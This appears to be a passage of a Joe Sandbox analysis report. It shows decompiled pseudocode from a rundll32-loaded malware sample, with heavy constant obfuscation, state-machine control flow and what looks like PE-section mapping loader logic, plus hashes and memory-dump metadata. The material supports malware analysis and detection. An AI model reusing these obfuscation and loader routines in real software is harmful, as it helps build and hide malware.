                                                                                                                                  				 *(_t245 + 0x20) =  *(_t245 + 0x20) ^ 0xddf73f48;
                                                                                                                                  				 *(_t245 + 0x1c) = 0x80403c;
                                                                                                                                  				 *(_t245 + 0x1c) =  *(_t245 + 0x1c) * 0x1c;
                                                                                                                                  				 *(_t245 + 0x1c) =  *(_t245 + 0x1c) ^ 0x0e0dbad6;
                                                                                                                                  				_push( *(_t245 + 0x58));
                                                                                                                                  				_push( *(_t245 + 0x40));
                                                                                                                                  				_t236 = 0x1e;
                                                                                                                                  				E002D4B61(_t142, _t236);
                                                                                                                                  				_t166 = _t245 - 0x220; // 0x12da7b13
                                                                                                                                  				E002D4B61(_t166, 0x208,  *(_t245 + 0x24),  *(_t245 + 0x34));
                                                                                                                                  				_t169 = _t245 - 0x428; // 0x12da790b
                                                                                                                                  				E002D4B61(_t169, 0x208,  *(_t245 + 0x2c),  *(_t245 + 0x60));
                                                                                                                                  				_t171 = _t245 - 0x220; // 0x12da7b13
                                                                                                                                  				E002D3BC0( *(_t245 + 0x44),  *(_t245 + 0x50), __edx,  *(_t245 + 0x18),  *(_t245 + 0x3c), _t171);
                                                                                                                                  				_t176 = _t245 - 0x428; // 0x12da790b
                                                                                                                                  				E002D3BC0( *(_t245 + 0x48),  *(_t245 + 0x5c),  *((intOrPtr*)(_t245 + 0x78)),  *(_t245 + 0x64),  *(_t245 + 0x68), _t176);
                                                                                                                                  				_t183 = _t245 - 0x18; // 0x12da7d1b
                                                                                                                                  				 *(_t245 - 0x14) =  *(_t245 + 0x38);
                                                                                                                                  				_t185 = _t245 - 0x220; // 0x12da7b13
                                                                                                                                  				 *((intOrPtr*)(_t245 - 0x10)) = _t185;
                                                                                                                                  				_t187 = _t245 - 0x428; // 0x12da790b
                                                                                                                                  				 *((intOrPtr*)(_t245 - 0xc)) = _t187;
                                                                                                                                  				 *((short*)(_t245 - 8)) =  *(_t245 + 0x54) |  *(_t245 + 0x4c) | 0x00000410;
                                                                                                                                  				_t222 = E002D4DDD( *(_t245 + 0x30), _t183,  *(_t245 + 0x28),  *(_t245 + 0x20),  *(_t245 + 0x1c));
                                                                                                                                  				asm("sbb eax, eax");
                                                                                                                                  				return  ~_t222 + 1;
                                                                                                                                  			}









                                                                                                                                  0x002f15f0
                                                                                                                                  0x002f15f7
                                                                                                                                  0x002f15fe
                                                                                                                                  0x002f1609
                                                                                                                                  0x002f160c
                                                                                                                                  0x002f1613
                                                                                                                                  0x002f1616
                                                                                                                                  0x002f161b
                                                                                                                                  0x002f161c
                                                                                                                                  0x002f1629
                                                                                                                                  0x002f1632
                                                                                                                                  0x002f163f
                                                                                                                                  0x002f1648
                                                                                                                                  0x002f164d
                                                                                                                                  0x002f1661
                                                                                                                                  0x002f1666
                                                                                                                                  0x002f167c
                                                                                                                                  0x002f1684
                                                                                                                                  0x002f1687
                                                                                                                                  0x002f168d
                                                                                                                                  0x002f1693
                                                                                                                                  0x002f1696
                                                                                                                                  0x002f169c
                                                                                                                                  0x002f16b0
                                                                                                                                  0x002f16ba
                                                                                                                                  0x002f16c4
                                                                                                                                  0x002f16cc

                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451115709.00000000002D1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451090160.00000000002D0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451178530.00000000002F3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_2d0000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: !h$5M$d,
                                                                                                                                  • API String ID: 0-3324333736
                                                                                                                                  • Opcode ID: 31a7f9833dcd0b326e9f299eef76f1a004f3f3853abdcdc5a6d1f5c948d3c773
                                                                                                                                  • Instruction ID: a532782768437df187fe5db9a231fa229685ebf6426b4bed4466abbe122368ec
                                                                                                                                  • Opcode Fuzzy Hash: 31a7f9833dcd0b326e9f299eef76f1a004f3f3853abdcdc5a6d1f5c948d3c773
                                                                                                                                  • Instruction Fuzzy Hash: E191CEB141038C9BCF58DF65C98A9DE3FB1BB04358F509219FD2A96260D3B5C999CF84
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 90%
                                                                                                                                  			E002EDEDC(signed int* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12, intOrPtr _a16) {
                                                                                                                                  				char _v44;
                                                                                                                                  				signed int _v48;
                                                                                                                                  				signed int _v52;
                                                                                                                                  				signed int _v56;
                                                                                                                                  				signed int _v60;
                                                                                                                                  				signed int _v64;
                                                                                                                                  				signed int _v68;
                                                                                                                                  				signed int _v72;
                                                                                                                                  				signed int _v76;
                                                                                                                                  				signed int _v80;
                                                                                                                                  				signed int _v84;
                                                                                                                                  				signed int _v88;
                                                                                                                                  				signed int _v92;
                                                                                                                                  				signed int _v96;
                                                                                                                                  				signed int _v100;
                                                                                                                                  				signed int _v104;
                                                                                                                                  				void* _t132;
                                                                                                                                  				signed int _t152;
                                                                                                                                  				signed int _t154;
                                                                                                                                  				signed int _t155;
                                                                                                                                  				void* _t158;
                                                                                                                                  				signed int* _t175;
                                                                                                                                  				void* _t177;
                                                                                                                                  				void* _t178;
                                                                                                                                  
                                                                                                                                  				_push(_a16);
                                                                                                                                  				_t174 = _a12;
                                                                                                                                  				_t175 = __ecx;
                                                                                                                                  				_push(_a12);
                                                                                                                                  				_push(_a8);
                                                                                                                                  				_push(_a4);
                                                                                                                                  				_push(__edx);
                                                                                                                                  				_push(__ecx);
                                                                                                                                  				E002E20B9(_t132);
                                                                                                                                  				_v68 = 0x4bd93;
                                                                                                                                  				_t178 = _t177 + 0x18;
                                                                                                                                  				_v68 = _v68 << 0xc;
                                                                                                                                  				_v68 = _v68 ^ 0x4bd93000;
                                                                                                                                  				_t158 = 0xc7349d4;
                                                                                                                                  				_v72 = 0xdd086a;
                                                                                                                                  				_v72 = _v72 + 0xe602;
                                                                                                                                  				_v72 = _v72 ^ 0x00de9932;
                                                                                                                                  				_v80 = 0x3b4fac;
                                                                                                                                  				_v80 = _v80 | 0x3fbbffff;
                                                                                                                                  				_v80 = _v80 ^ 0x3fb1db7a;
                                                                                                                                  				_v84 = 0xeaa49b;
                                                                                                                                  				_v84 = _v84 | 0xeaf55708;
                                                                                                                                  				_v84 = _v84 ^ 0x8a8b7318;
                                                                                                                                  				_v84 = _v84 ^ 0x607b886d;
                                                                                                                                  				_v88 = 0x47a;
                                                                                                                                  				_v88 = _v88 << 0x10;
                                                                                                                                  				_v88 = _v88 << 7;
                                                                                                                                  				_v88 = _v88 ^ 0x3d0d9eb4;
                                                                                                                                  				_v92 = 0xf1af5e;
                                                                                                                                  				_v92 = _v92 >> 0xc;
                                                                                                                                  				_t154 = 0x35;
                                                                                                                                  				_v92 = _v92 * 0x55;
                                                                                                                                  				_v92 = _v92 ^ 0x000492d7;
                                                                                                                                  				_v104 = 0x9f0b47;
                                                                                                                                  				_v104 = _v104 + 0xffffc934;
                                                                                                                                  				_v104 = _v104 ^ 0x723421f7;
                                                                                                                                  				_v104 = _v104 | 0x7192d654;
                                                                                                                                  				_v104 = _v104 ^ 0x73b08a7e;
                                                                                                                                  				_v100 = 0x1207d9;
                                                                                                                                  				_v100 = _v100 + 0x7e1b;
                                                                                                                                  				_v100 = _v100 | 0x7b677906;
                                                                                                                                  				_v100 = _v100 * 0xf;
                                                                                                                                  				_v100 = _v100 ^ 0x3c0b4b50;
                                                                                                                                  				_v60 = 0x5b441e;
                                                                                                                                  				_v60 = _v60 ^ 0x5c22d9cd;
                                                                                                                                  				_v60 = _v60 ^ 0x5c7ef938;
                                                                                                                                  				_v64 = 0xefe367;
                                                                                                                                  				_v64 = _v64 + 0x4581;
                                                                                                                                  				_v64 = _v64 ^ 0x00f6697a;
                                                                                                                                  				_v76 = 0x71c375;
                                                                                                                                  				_t155 = 0x14;
                                                                                                                                  				_v76 = _v76 / _t154;
                                                                                                                                  				_v76 = _v76 + 0xaf56;
                                                                                                                                  				_v76 = _v76 ^ 0x000ba048;
                                                                                                                                  				_v48 = 0x1a9f92;
                                                                                                                                  				_v48 = _v48 + 0x9d50;
                                                                                                                                  				_v48 = _v48 ^ 0x001d37d0;
                                                                                                                                  				_v52 = 0xf5c688;
                                                                                                                                  				_v52 = _v52 + 0xffff5f34;
                                                                                                                                  				_v52 = _v52 ^ 0x00ffa10c;
                                                                                                                                  				_v56 = 0x3cec64;
                                                                                                                                  				_v56 = _v56 ^ 0x003949c0;
                                                                                                                                  				_v96 = 0x7057ec;
                                                                                                                                  				_v96 = _v96 * 0x35;
                                                                                                                                  				_v96 = _v96 | 0xca3e56e5;
                                                                                                                                  				_v96 = _v96 / _t155;
                                                                                                                                  				_v96 = _v96 ^ 0x0b2d80e0;
                                                                                                                                  				do {
                                                                                                                                  					while(_t158 != 0x254c3a7) {
                                                                                                                                  						if(_t158 == 0x324cad4) {
                                                                                                                                  							E002E0DAF(_v100,  &_v44, _v60,  *_t174, _v64, _v76);
                                                                                                                                  							_t178 = _t178 + 0x10;
                                                                                                                                  							_t158 = 0xd972b83;
                                                                                                                                  							continue;
                                                                                                                                  						} else {
                                                                                                                                  							if(_t158 == 0xc7349d4) {
                                                                                                                                  								_t158 = 0x254c3a7;
                                                                                                                                  								 *_t175 =  *_t175 & 0x00000000;
                                                                                                                                  								_t175[1] = _v68;
                                                                                                                                  								continue;
                                                                                                                                  							} else {
                                                                                                                                  								if(_t158 == 0xd972b83) {
                                                                                                                                  									E002F0E3A( &_v44, _v48, __eflags, _v52, _v56, _v96, _t174 + 4);
                                                                                                                                  								} else {
                                                                                                                                  									if(_t158 == 0xecd5bc1) {
                                                                                                                                  										_push(_t158);
                                                                                                                                  										_push(_t158);
                                                                                                                                  										_t152 = E002D7FF2(_t175[1]);
                                                                                                                                  										 *_t175 = _t152;
                                                                                                                                  										__eflags = _t152;
                                                                                                                                  										if(__eflags != 0) {
                                                                                                                                  											_t158 = 0xfbc7198;
                                                                                                                                  											continue;
                                                                                                                                  										}
                                                                                                                                  									} else {
                                                                                                                                  										if(_t158 != 0xfbc7198) {
                                                                                                                                  											goto L13;
                                                                                                                                  										} else {
                                                                                                                                  											E002D3DBC( &_v44, _t175, _v88, _v92, _v104);
                                                                                                                                  											_t178 = _t178 + 0xc;
                                                                                                                                  											_t158 = 0x324cad4;
                                                                                                                                  											continue;
                                                                                                                                  										}
                                                                                                                                  									}
                                                                                                                                  								}
                                                                                                                                  							}
                                                                                                                                  						}
                                                                                                                                  						L16:
                                                                                                                                  						__eflags =  *_t175;
                                                                                                                                  						_t131 =  *_t175 != 0;
                                                                                                                                  						__eflags = _t131;
                                                                                                                                  						return 0 | _t131;
                                                                                                                                  					}
                                                                                                                                  					_t175[1] = E002EAC3A(_t174);
                                                                                                                                  					_t158 = 0xecd5bc1;
                                                                                                                                  					L13:
                                                                                                                                  					__eflags = _t158 - 0x72dd7bf;
                                                                                                                                  				} while (__eflags != 0);
                                                                                                                                  				goto L16;
                                                                                                                                  			}




























                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451115709.00000000002D1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451090160.00000000002D0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451178530.00000000002F3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_2d0000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: d<$g$Wp
                                                                                                                                  • API String ID: 0-355099142
                                                                                                                                  • Opcode ID: 6b2c2b6d1b47deee33f6011a26382e9fad0b3e922fbca3b1d898976e6b354319
                                                                                                                                  • Instruction ID: 88cabe84e94a0c8ad428d740633360418bc8caea52b8cdf9498ab886fc2a74ce
                                                                                                                                  • Opcode Fuzzy Hash: 6b2c2b6d1b47deee33f6011a26382e9fad0b3e922fbca3b1d898976e6b354319
                                                                                                                                  • Instruction Fuzzy Hash: C37132B10193419FC768CF61C48942FBBF1FBC9748F50891DF29A96220D3B69A59CF46
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 90%
                                                                                                                                  			E002EC3A0(intOrPtr* __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a16) {
                                                                                                                                  				signed int _v4;
                                                                                                                                  				intOrPtr _v8;
                                                                                                                                  				intOrPtr _v12;
                                                                                                                                  				signed int _v16;
                                                                                                                                  				signed int _v20;
                                                                                                                                  				signed int _v24;
                                                                                                                                  				signed int _v28;
                                                                                                                                  				signed int _v32;
                                                                                                                                  				signed int _v36;
                                                                                                                                  				signed int _v40;
                                                                                                                                  				signed int _v44;
                                                                                                                                  				signed int _v48;
                                                                                                                                  				signed int _v52;
                                                                                                                                  				signed int _v56;
                                                                                                                                  				signed int _v60;
                                                                                                                                  				signed int _v64;
                                                                                                                                  				void* _t137;
                                                                                                                                  				void* _t149;
                                                                                                                                  				void* _t159;
                                                                                                                                  				void* _t161;
                                                                                                                                  				signed int _t163;
                                                                                                                                  				signed int _t164;
                                                                                                                                  				signed int _t165;
                                                                                                                                  				signed int _t166;
                                                                                                                                  				signed int _t167;
                                                                                                                                  				void* _t188;
                                                                                                                                  				void* _t193;
                                                                                                                                  				intOrPtr* _t195;
                                                                                                                                  				signed int* _t197;
                                                                                                                                  				signed int* _t198;
                                                                                                                                  				signed int* _t199;
                                                                                                                                  
                                                                                                                                  				_push(_a16);
                                                                                                                                  				_t195 = __ecx;
                                                                                                                                  				_push(0);
                                                                                                                                  				_push(_a8);
                                                                                                                                  				_push(_a4);
                                                                                                                                  				_push(__edx);
                                                                                                                                  				_push(__ecx);
                                                                                                                                  				E002E20B9(_t137);
                                                                                                                                  				_v4 = _v4 & 0x00000000;
                                                                                                                                  				_v12 = 0x8437e8;
                                                                                                                                  				_v8 = 0xdb9720;
                                                                                                                                  				_v60 = 0xf5e956;
                                                                                                                                  				_v60 = _v60 << 0xc;
                                                                                                                                  				_t163 = 0x6b;
                                                                                                                                  				_v60 = _v60 / _t163;
                                                                                                                                  				_v60 = _v60 | 0x488cc8ef;
                                                                                                                                  				_v60 = _v60 ^ 0x48eedbff;
                                                                                                                                  				_v44 = 0x82c5a5;
                                                                                                                                  				_v44 = _v44 | 0x04b6a6f1;
                                                                                                                                  				_t164 = 0x4a;
                                                                                                                                  				_v44 = _v44 * 0x6a;
                                                                                                                                  				_v44 = _v44 ^ 0xf3bc2b72;
                                                                                                                                  				_v40 = 0x882fad;
                                                                                                                                  				_v40 = _v40 ^ 0x709d76bd;
                                                                                                                                  				_v40 = _v40 + 0xffff52d2;
                                                                                                                                  				_v40 = _v40 ^ 0x7014aba2;
                                                                                                                                  				_v28 = 0x22e756;
                                                                                                                                  				_v28 = _v28 + 0x769a;
                                                                                                                                  				_v28 = _v28 ^ 0x002bcc4a;
                                                                                                                                  				_v64 = 0xc290d0;
                                                                                                                                  				_v64 = _v64 + 0xffff641a;
                                                                                                                                  				_v64 = _v64 << 0xd;
                                                                                                                                  				_v64 = _v64 ^ 0xbd78a131;
                                                                                                                                  				_v64 = _v64 ^ 0x83ed8c94;
                                                                                                                                  				_v32 = 0x78b1b0;
                                                                                                                                  				_v32 = _v32 << 0xe;
                                                                                                                                  				_v32 = _v32 ^ 0x2c621b2d;
                                                                                                                                  				_v36 = 0xa1b61f;
                                                                                                                                  				_v36 = _v36 + 0xb017;
                                                                                                                                  				_v36 = _v36 | 0xc1836c3e;
                                                                                                                                  				_v36 = _v36 ^ 0xc1a0ee75;
                                                                                                                                  				_v56 = 0x2861cb;
                                                                                                                                  				_v56 = _v56 / _t164;
                                                                                                                                  				_v56 = _v56 << 0xd;
                                                                                                                                  				_t165 = 0x1b;
                                                                                                                                  				_v56 = _v56 / _t165;
                                                                                                                                  				_v56 = _v56 ^ 0x00aa9f16;
                                                                                                                                  				_v24 = 0x4a8582;
                                                                                                                                  				_v24 = _v24 | 0x39704e96;
                                                                                                                                  				_v24 = _v24 ^ 0x397cf0ca;
                                                                                                                                  				_v52 = 0x9fdf3f;
                                                                                                                                  				_v52 = _v52 | 0x733ecb9c;
                                                                                                                                  				_v52 = _v52 >> 0x10;
                                                                                                                                  				_t166 = 0x2c;
                                                                                                                                  				_v52 = _v52 / _t166;
                                                                                                                                  				_v52 = _v52 ^ 0x0002453b;
                                                                                                                                  				_v20 = 0x70cd9;
                                                                                                                                  				_v20 = _v20 ^ 0x0384d77a;
                                                                                                                                  				_v20 = _v20 ^ 0x03811849;
                                                                                                                                  				_v16 = 0x6ca56e;
                                                                                                                                  				_v16 = _v16 * 0x1c;
                                                                                                                                  				_v16 = _v16 ^ 0x0be055d0;
                                                                                                                                  				_v48 = 0x383b50;
                                                                                                                                  				_v48 = _v48 + 0xe78c;
                                                                                                                                  				_v48 = _v48 + 0x7960;
                                                                                                                                  				_v48 = _v48 + 0xffff251b;
                                                                                                                                  				_v48 = _v48 ^ 0x003eca00;
                                                                                                                                  				_t167 = _v28;
                                                                                                                                  				_t149 = E002D474F(_t167, __ecx, _v64, _v32);
                                                                                                                                  				_t159 = _t149;
                                                                                                                                  				_t197 =  &(( &_v64)[8]);
                                                                                                                                  				if(_t159 != 0) {
                                                                                                                                  					_push(_t167);
                                                                                                                                  					_t188 = E002DA3A3( *((intOrPtr*)(_t159 + 0x50)), _v36, _v56, _v24, _v40, _v44 | _v60);
                                                                                                                                  					_t198 =  &(_t197[5]);
                                                                                                                                  					if(_t188 == 0) {
                                                                                                                                  						L6:
                                                                                                                                  						return _t188;
                                                                                                                                  					}
                                                                                                                                  					E002DED7E(_v52, _t188, _v20,  *__ecx,  *((intOrPtr*)(_t159 + 0x54)));
                                                                                                                                  					_t199 =  &(_t198[3]);
                                                                                                                                  					_t193 = ( *(_t159 + 0x14) & 0x0000ffff) + 0x18 + _t159;
                                                                                                                                  					_t161 = ( *(_t159 + 6) & 0x0000ffff) * 0x28 + _t193;
                                                                                                                                  					while(_t193 < _t161) {
                                                                                                                                  						_t157 =  <  ?  *((void*)(_t193 + 8)) :  *((intOrPtr*)(_t193 + 0x10));
                                                                                                                                  						E002DED7E(_v16,  *((intOrPtr*)(_t193 + 0xc)) + _t188, _v48,  *((intOrPtr*)(_t193 + 0x14)) +  *_t195,  <  ?  *((void*)(_t193 + 8)) :  *((intOrPtr*)(_t193 + 0x10)));
                                                                                                                                  						_t199 =  &(_t199[3]);
                                                                                                                                  						_t193 = _t193 + 0x28;
                                                                                                                                  					}
                                                                                                                                  					goto L6;
                                                                                                                                  				}
                                                                                                                                  				return _t149;
                                                                                                                                  			}



































                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451115709.00000000002D1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451090160.00000000002D0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451178530.00000000002F3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_2d0000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: P;8$V"$`y
                                                                                                                                  • API String ID: 0-4109183828
                                                                                                                                  • Opcode ID: da3d3e966c2bfd9a43e683d3757623c06ebfc3864563e683fe95cfd531e9bb60
                                                                                                                                  • Instruction ID: ce0dd2b69099df2f1e4252663a7f8d8f84576fc025a85f92a6b5cbb4ee475e2b
                                                                                                                                  • Opcode Fuzzy Hash: da3d3e966c2bfd9a43e683d3757623c06ebfc3864563e683fe95cfd531e9bb60
                                                                                                                                  • Instruction Fuzzy Hash: 856155715183409FC354CF66C88991BBBF2FBC8718F508A1CF69A96260D7B2D919CF06
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 93%
                                                                                                                                  			E002D1A56(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
                                                                                                                                  				char _v44;
                                                                                                                                  				signed int _v48;
                                                                                                                                  				signed int _v52;
                                                                                                                                  				signed int _v56;
                                                                                                                                  				signed int _v60;
                                                                                                                                  				signed int _v64;
                                                                                                                                  				signed int _v68;
                                                                                                                                  				signed int _v72;
                                                                                                                                  				signed int _v76;
                                                                                                                                  				signed int _v80;
                                                                                                                                  				void* _t86;
                                                                                                                                  				void* _t100;
                                                                                                                                  				void* _t101;
                                                                                                                                  				void* _t103;
                                                                                                                                  				void* _t115;
                                                                                                                                  				void* _t116;
                                                                                                                                  				signed int _t117;
                                                                                                                                  				void* _t119;
                                                                                                                                  				void* _t120;
                                                                                                                                  
                                                                                                                                  				_push(_a8);
                                                                                                                                  				_t115 = __edx;
                                                                                                                                  				_t101 = __ecx;
                                                                                                                                  				_push(_a4);
                                                                                                                                  				_push(__edx);
                                                                                                                                  				_push(__ecx);
                                                                                                                                  				E002E20B9(_t86);
                                                                                                                                  				_v72 = 0xccde8a;
                                                                                                                                  				_t120 = _t119 + 0x10;
                                                                                                                                  				_v72 = _v72 | 0xfb673ead;
                                                                                                                                  				_v72 = _v72 + 0xedb6;
                                                                                                                                  				_t116 = 0;
                                                                                                                                  				_v72 = _v72 + 0xffff76c0;
                                                                                                                                  				_t103 = 0x3303944;
                                                                                                                                  				_v72 = _v72 ^ 0xfbf43e98;
                                                                                                                                  				_v48 = 0xd56f6c;
                                                                                                                                  				_v48 = _v48 ^ 0x96c3cc23;
                                                                                                                                  				_v48 = _v48 ^ 0x96174539;
                                                                                                                                  				_v76 = 0xdcf6fd;
                                                                                                                                  				_v76 = _v76 + 0xffffee01;
                                                                                                                                  				_t117 = 0x65;
                                                                                                                                  				_v76 = _v76 * 0x23;
                                                                                                                                  				_v76 = _v76 + 0xffff4e11;
                                                                                                                                  				_v76 = _v76 ^ 0x1e3c7761;
                                                                                                                                  				_v80 = 0x144f78;
                                                                                                                                  				_v80 = _v80 * 0x39;
                                                                                                                                  				_v80 = _v80 ^ 0xe273dc44;
                                                                                                                                  				_v80 = _v80 >> 5;
                                                                                                                                  				_v80 = _v80 ^ 0x073b5be1;
                                                                                                                                  				_v52 = 0xb4a3bb;
                                                                                                                                  				_v52 = _v52 ^ 0x916b14c7;
                                                                                                                                  				_v52 = _v52 ^ 0x91dd676b;
                                                                                                                                  				_v68 = 0x8d73f0;
                                                                                                                                  				_v68 = _v68 >> 0xe;
                                                                                                                                  				_v68 = _v68 * 0x1c;
                                                                                                                                  				_v68 = _v68 ^ 0x0000c864;
                                                                                                                                  				_v56 = 0xe6cb06;
                                                                                                                                  				_v56 = _v56 >> 4;
                                                                                                                                  				_v56 = _v56 | 0x1af2f565;
                                                                                                                                  				_v56 = _v56 ^ 0x1af384df;
                                                                                                                                  				_v60 = 0x4f2325;
                                                                                                                                  				_t55 =  &_v60; // 0x4f2325
                                                                                                                                  				_v60 =  *_t55 * 0x78;
                                                                                                                                  				_t57 =  &_v60; // 0x4f2325
                                                                                                                                  				_v60 =  *_t57 / _t117;
                                                                                                                                  				_v60 = _v60 ^ 0x0059a097;
                                                                                                                                  				_v64 = 0xa290a2;
                                                                                                                                  				_v64 = _v64 >> 4;
                                                                                                                                  				_v64 = _v64 + 0x6f89;
                                                                                                                                  				_v64 = _v64 ^ 0x00044b6b;
                                                                                                                                  				while(_t103 != 0x3303944) {
                                                                                                                                  					if(_t103 == 0x5a97fa2) {
                                                                                                                                  						__eflags = E002ED97D( &_v44, _v56, __eflags, _v60, _t115 + 0x30, _v64);
                                                                                                                                  						_t116 =  !=  ? 1 : _t116;
                                                                                                                                  					} else {
                                                                                                                                  						if(_t103 == 0xa5a4144) {
                                                                                                                                  							E002D3DBC( &_v44, _t101, _v72, _v48, _v76);
                                                                                                                                  							_t120 = _t120 + 0xc;
                                                                                                                                  							_t103 = 0xf0cd209;
                                                                                                                                  							continue;
                                                                                                                                  						} else {
                                                                                                                                  							if(_t103 != 0xf0cd209) {
                                                                                                                                  								L9:
                                                                                                                                  								__eflags = _t103 - 0x1b06c67;
                                                                                                                                  								if(__eflags != 0) {
                                                                                                                                  									continue;
                                                                                                                                  								} else {
                                                                                                                                  								}
                                                                                                                                  							} else {
                                                                                                                                  								_t100 = E002D2A21(_v80, _v52,  &_v44, _t115 + 0x38, _v68);
                                                                                                                                  								_t120 = _t120 + 0xc;
                                                                                                                                  								if(_t100 != 0) {
                                                                                                                                  									_t103 = 0x5a97fa2;
                                                                                                                                  									continue;
                                                                                                                                  								}
                                                                                                                                  							}
                                                                                                                                  						}
                                                                                                                                  					}
                                                                                                                                  					return _t116;
                                                                                                                                  				}
                                                                                                                                  				_t103 = 0xa5a4144;
                                                                                                                                  				goto L9;
                                                                                                                                  			}























                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451115709.00000000002D1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451090160.00000000002D0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451178530.00000000002F3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_2d0000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: %#O$DAZ$DAZ
                                                                                                                                  • API String ID: 0-2081751441
                                                                                                                                  • Opcode ID: 735cac04c0b91fcafe53dd54d1087b531fb08a74cbfbbe1956c72258fa92def8
                                                                                                                                  • Instruction ID: d43e6627cdb050d51b123e16b5749ee6621dba6e2cd6d29be382f6defc2df574
                                                                                                                                  • Opcode Fuzzy Hash: 735cac04c0b91fcafe53dd54d1087b531fb08a74cbfbbe1956c72258fa92def8
                                                                                                                                  • Instruction Fuzzy Hash: BF515671518302AFC758CF25D98581BBBE1FBD8708F500A2EF586A2660D375CA298F87
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 96%
                                                                                                                                  			E002F0C14(void* __ecx) {
                                                                                                                                  				signed int _v4;
                                                                                                                                  				signed int _v8;
                                                                                                                                  				signed int _v12;
                                                                                                                                  				signed int _v16;
                                                                                                                                  				signed int _v20;
                                                                                                                                  				signed int _v24;
                                                                                                                                  				signed int _v28;
                                                                                                                                  				signed int _v32;
                                                                                                                                  				signed int _v36;
                                                                                                                                  				signed int _v40;
                                                                                                                                  				signed int _v44;
                                                                                                                                  				void* _t111;
                                                                                                                                  				void* _t115;
                                                                                                                                  				void* _t116;
                                                                                                                                  				signed int _t118;
                                                                                                                                  				void* _t124;
                                                                                                                                  				void* _t125;
                                                                                                                                  				signed int* _t127;
                                                                                                                                  
                                                                                                                                  				_t127 =  &_v44;
                                                                                                                                  				_t116 = __ecx;
                                                                                                                                  				_v24 = 0x2b1199;
                                                                                                                                  				_v24 = _v24 + 0x4ba2;
                                                                                                                                  				_v24 = _v24 << 0xa;
                                                                                                                                  				_v24 = _v24 ^ 0xad737bf1;
                                                                                                                                  				_v44 = 0xc9a4fe;
                                                                                                                                  				_v44 = _v44 << 0xe;
                                                                                                                                  				_v44 = _v44 | 0xe69540e1;
                                                                                                                                  				_v44 = _v44 + 0xffffff88;
                                                                                                                                  				_v44 = _v44 ^ 0xefbb2da7;
                                                                                                                                  				_v28 = 0xedc73;
                                                                                                                                  				_v28 = _v28 + 0xffff2701;
                                                                                                                                  				_v28 = _v28 + 0x8bbf;
                                                                                                                                  				_v28 = _v28 ^ 0x00055e2c;
                                                                                                                                  				_v16 = 0xf95115;
                                                                                                                                  				_v16 = _v16 | 0x79ce56df;
                                                                                                                                  				_v16 = _v16 + 0xffff5817;
                                                                                                                                  				_v16 = _v16 ^ 0x79f40a5c;
                                                                                                                                  				_v36 = 0x520750;
                                                                                                                                  				_v36 = _v36 << 7;
                                                                                                                                  				_v36 = _v36 ^ 0x4f263ebd;
                                                                                                                                  				_v36 = _v36 * 6;
                                                                                                                                  				_v36 = _v36 ^ 0x64ef8369;
                                                                                                                                  				_t124 = 0;
                                                                                                                                  				_v40 = 0xccfebc;
                                                                                                                                  				_t125 = 0x2aa38ff;
                                                                                                                                  				_v40 = _v40 + 0xbaf7;
                                                                                                                                  				_t118 = 0xd;
                                                                                                                                  				_v40 = _v40 * 0x5e;
                                                                                                                                  				_v40 = _v40 + 0x6a66;
                                                                                                                                  				_v40 = _v40 ^ 0x4b80704d;
                                                                                                                                  				_v20 = 0xba2b89;
                                                                                                                                  				_v20 = _v20 + 0xa093;
                                                                                                                                  				_v20 = _v20 / _t118;
                                                                                                                                  				_v20 = _v20 ^ 0x000a03fd;
                                                                                                                                  				_v32 = 0xb0f3b0;
                                                                                                                                  				_v32 = _v32 + 0x50dc;
                                                                                                                                  				_v32 = _v32 + 0xffff1629;
                                                                                                                                  				_v32 = _v32 * 0x4e;
                                                                                                                                  				_v32 = _v32 ^ 0x35b73aee;
                                                                                                                                  				_v4 = 0x432383;
